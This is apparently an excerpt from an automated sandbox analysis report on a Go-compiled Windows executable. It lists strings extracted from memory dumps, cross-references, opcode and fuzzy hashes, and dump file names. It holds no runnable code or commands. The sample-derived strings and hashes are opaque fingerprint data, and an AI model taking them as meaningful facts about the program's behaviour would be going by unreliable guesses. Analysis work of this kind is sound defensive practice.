                                                                      • String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=$WINDIR\rss%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat$ m->p= next= p->m= prev= span=(...), not , val 390625<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCANCELCarianChakmaCommonCookieCopticDELETEExpectFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPr$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestart copied file: %wstartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustrace/br$releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileunexpected )unknown portwintrust.dllwirep: p->m=wtsapi32.dll != sweepgen MB released MB) workers= called from flushedWork gcscanvalid heap_marked=
                                                                      • API String ID: 0-2527030486
                                                                      • Opcode ID: 8b97a09f3ca774cfadb3114678e64e069106bda406771d947f6698ffa7ea8ee8
                                                                      • Instruction ID: 7f80efca96c7c0026b2bbb8fce386263dcbd652a6508ac33117d8161810f2d9f
                                                                      • Opcode Fuzzy Hash: 8b97a09f3ca774cfadb3114678e64e069106bda406771d947f6698ffa7ea8ee8
                                                                      • Instruction Fuzzy Hash: CE51D4B46083158FD704EF25D185B6ABBE0BF88308F41996EE48987352D778D888DF96
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Executed Functions

                                                                      Non-executed Functions

                                                                      Strings
                                                                      • VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing public modulusfailed to apply ACL to, xrefs: 00428C60
                                                                      • bad g0 stackbad recoveryc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdumping heapend tracegcentersyscallexit status failed to %sfailed to %wgcpacertraceget UUID: %wgetaddrinfowhost is , xrefs: 00428C05
                                                                      • ,-./0456:;<=>?@BCLMNOPSZ["\, xrefs: 00428BC0
                                                                      • ", xrefs: 00428C69
                                                                      • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00428C2C
                                                                      • runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtoo many open filesunknown Go type: %vunknown certificateunknown cipher typeunknown status codeunknown wait , xrefs: 00428B96
                                                                      Memory Dump Source
                                                                      • Source File: 00000032.00000002.925837140.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000032.00000002.925821610.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000032.00000002.926543002.00000000008C3000.00000040.00020000.sdmp
                                                                      • Associated: 00000032.00000002.926560099.00000000008D1000.00000040.00020000.sdmp
                                                                      • Associated: 00000032.00000002.926580117.00000000008D4000.00000040.00020000.sdmp
                                                                      • Associated: 00000032.00000002.926595109.00000000008D7000.00000040.00020000.sdmp
                                                                      • Associated: 00000032.00000002.926608216.00000000008D8000.00000080.00020000.sdmp
                                                                      • Associated: 00000032.00000002.926624820.00000000008D9000.00000004.00020000.sdmp
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "$,-./0456:;<=>?@BCLMNOPSZ["\$VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing public modulusfailed to apply ACL to$bad g0 stackbad recoveryc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdumping heapend tracegcentersyscallexit status failed to %sfailed to %wgcpacertraceget UUID: %wgetaddrinfowhost is $runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtoo many open filesunknown Go type: %vunknown certificateunknown cipher typeunknown status codeunknown wait
                                                                      • API String ID: 0-1070706453
                                                                      • Opcode ID: 35bfc13783085809ff100db792aae9c6576bf432ec796ad2e4c0f2543c7307a5
                                                                      • Instruction ID: d05530f15c22603299acca85900aed5cb2d67bbfa8ea3cc37d9bd2921fc2a2af
                                                                      • Opcode Fuzzy Hash: 35bfc13783085809ff100db792aae9c6576bf432ec796ad2e4c0f2543c7307a5
                                                                      • Instruction Fuzzy Hash: E95105B42097118FD340EF29D58575EBBE0FF48708F808A2EE88887352E7389944DF56
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileunexpected )unknown portwintrust.dllwirep: p->m=wtsapi32.dll != sweepgen MB released MB) workers= called from flushedWork gcscanvalid heap_marked= , xrefs: 00434566
                                                                      • m->p= next= p->m= prev= span=(...), not , val 390625<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCANCELCarianChakmaCommonCookieCopticDELETEExpectFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPr, xrefs: 00434588
                                                                      • m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=$WINDIR\rss%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat, xrefs: 004345D4
                                                                      • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestart copied file: %wstartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustrace/br, xrefs: 00434662
                                                                      Memory Dump Source
                                                                      • Source File: 00000032.00000002.925837140.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000032.00000002.925821610.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000032.00000002.926543002.00000000008C3000.00000040.00020000.sdmp
                                                                      • Associated: 00000032.00000002.926560099.00000000008D1000.00000040.00020000.sdmp
                                                                      • Associated: 00000032.00000002.926580117.00000000008D4000.00000040.00020000.sdmp
                                                                      • Associated: 00000032.00000002.926595109.00000000008D7000.00000040.00020000.sdmp
                                                                      • Associated: 00000032.00000002.926608216.00000000008D8000.00000080.00020000.sdmp
                                                                      • Associated: 00000032.00000002.926624820.00000000008D9000.00000004.00020000.sdmp
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=$WINDIR\rss%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat$ m->p= next= p->m= prev= span=(...), not , val 390625<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCANCELCarianChakmaCommonCookieCopticDELETEExpectFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPr$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestart copied file: %wstartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustrace/br$releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileunexpected )unknown portwintrust.dllwirep: p->m=wtsapi32.dll != sweepgen MB released MB) workers= called from flushedWork gcscanvalid heap_marked=
                                                                      • API String ID: 0-2527030486
                                                                      • Opcode ID: 8b97a09f3ca774cfadb3114678e64e069106bda406771d947f6698ffa7ea8ee8
                                                                      • Instruction ID: 7f80efca96c7c0026b2bbb8fce386263dcbd652a6508ac33117d8161810f2d9f
                                                                      • Opcode Fuzzy Hash: 8b97a09f3ca774cfadb3114678e64e069106bda406771d947f6698ffa7ea8ee8
                                                                      • Instruction Fuzzy Hash: CE51D4B46083158FD704EF25D185B6ABBE0BF88308F41996EE48987352D778D888DF96
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%